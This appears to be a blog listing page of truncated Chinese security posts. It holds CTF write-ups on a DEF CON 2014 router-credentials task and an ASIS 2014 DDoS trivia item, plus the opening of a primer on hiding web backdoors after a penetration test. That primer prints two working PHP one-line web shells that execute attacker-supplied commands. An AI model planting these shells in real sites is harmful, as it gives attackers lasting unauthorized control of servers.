[CTF]Defcon-CTF-Quals-2014-Routarded/Hackertool/3dttt-Writeup
Routarded Points: 1
Description:
Wow, they forwarded http on a router with default creds? It must be my birthday!
http://routarded_87f7837f50a5370771b9467d840c93c5.2014.shallweplayaga.me:5000/
我不会向你叙述一个汉语狗由于对It must be my birthday的错误理解引起的辛酸历程...
题目已述,使用默认凭据可以登陆服务器,基础认证,BurpSuite跑了几遍......
Web后门隐藏与维持 - Web Backdoor Hidden and Maintenance
前言
在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.
以PHP-WEBBACKDOOR为例,抛砖引玉
一个最常见的一句话后门可能写作这样
<?php @eval($_POST['cmd']);?>
或这样
<?php @assert($_POST['cmd']);?>
当然,这仅是调用的函数不同,关于PHP禁用的函数请在
php.ini: disable_functions =
中寻......
[CTF]ASIS-CTF-Quals-2014-Trivia2/ToqToq-Writeup
Trivia2 [Trivia10]
说明:
Trivia 2 Points 10
Description
Downtime caused to a website by massive referrals from another popular site.
Do not calculate md5 or add ASIS_
联想最近的FaceBook的DDos文章
http://chr13.com/2014/04/20/using-facebook-notes-to-ddos-any-website/
借助搜索引擎搜索试来试去得到Wiki里这个关键词:
......